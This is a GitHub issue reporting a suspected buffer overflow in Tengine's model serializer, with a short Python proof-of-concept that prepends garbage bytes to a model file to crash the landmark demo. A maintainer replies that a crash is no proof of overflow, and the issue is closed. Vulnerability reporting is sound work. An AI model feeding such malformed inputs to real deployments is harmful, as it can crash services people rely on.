Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

A buffer overflow is found in serializer #476

Closed
marckwei opened this issue Nov 11, 2020 · 1 comment
Closed

A buffer overflow is found in serializer #476

marckwei opened this issue Nov 11, 2020 · 1 comment

Comments

@marckwei
Copy link

marckwei commented Nov 11, 2020

Vulnerability analysis

We found that in the seriliazer module, there is a buffer overflow problem

Link:https://github.com/OAID/Tengine/blob/tengine-lite/src/serializer/tm/tm2_serializer.c

The problem is in the load_model function starting at line 798, which calls the get_tm_file_model function at line 840

img

The first parameter mem_base of the get_tm_file_model function points to the address space where the model file is located, and the second parameter is controlled by mem_base. For this project, the model is an input controlled by the user, so the parameters of get_tm_file_model can be controlled.

img

img

Poc

Download the official example model, and select the landmark model to demonstrate here.

According to the official use case, the landmark model is run normally, and the program executes normally.

img

Write 9 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. Program routine error.

img

Write 10 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. program crash.

img

EXP:

import os 
os.system('cp landmark.tmfile test.tmfile') 
with open("./test.tmfile","rb+") as f: 
    old=f.read() 
    len=0xA 
    print('Writes %d bytes of data to the file header'%(len)) 
    text=b'A'*len 
    f.seek(0) 
    f.write(text) 
    f.write(old) 
 
os.system('./attack.sh')

'''
attack.sh
dir='/mnt/hgfs/starcross/CVE/Tengine-Lite' 
export LD_LIBRARY_PATH=$dir/build/install/lib 
$dir/build/install/bin/tm_landmark -m $dir/model/landmark/test.tmfile -i $dir/model/landmark/photo.jpg -r 1 -t 1
'''
@cyberfire
Copy link

@marckwei

Thanks for reporting the potential issue.
As the model header with wrong content will cause program crash and it is that what you observed. I don't think there is an proof of overflow so far.

please refers to the model format definition. https://github.com/OAID/Tengine/wiki/The-format-of-tmfile

Thanks,

Haitao

@kalcohol kalcohol closed this as completed Mar 3, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants